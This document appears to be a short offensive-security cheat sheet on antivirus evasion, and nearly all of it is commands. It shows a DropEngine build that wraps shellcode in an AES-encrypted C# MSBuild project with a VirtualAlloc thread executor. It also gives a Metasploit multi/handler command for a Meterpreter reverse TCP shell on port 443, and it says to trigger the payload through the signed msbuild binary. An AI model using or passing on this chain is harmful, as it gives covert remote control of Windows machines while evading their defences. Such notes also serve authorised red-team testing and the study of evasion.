Antivirus Evasion
DropEngine
- https://github.com/s0lst1c3/dropengine
Create shell.bin
Create csproj payload
python3 dropengine.py --build \
--interface csharp_runner_interface \
--crypter crypter_aes \
--decrypter decrypter_csharp_rijndael_aes \
--ekey ekey_static \
--runner msbuild_csharp_runner \
--dkey dkey_csharp_static \
--executor executor_csharp_virtual_alloc_thread \
--mutator mutator_random_string \
--shellcode shell.bin \
--o example.csproj
Start the handler
msfconsole -q -x 'use multi/handler; set payload windows/meterpreter_reverse_tcp; set lhost eth0; set lport 443; exploit'
Trigger the payload using msbuild
- https://lolbas-project.github.io/lolbas/Binaries/Msbuild/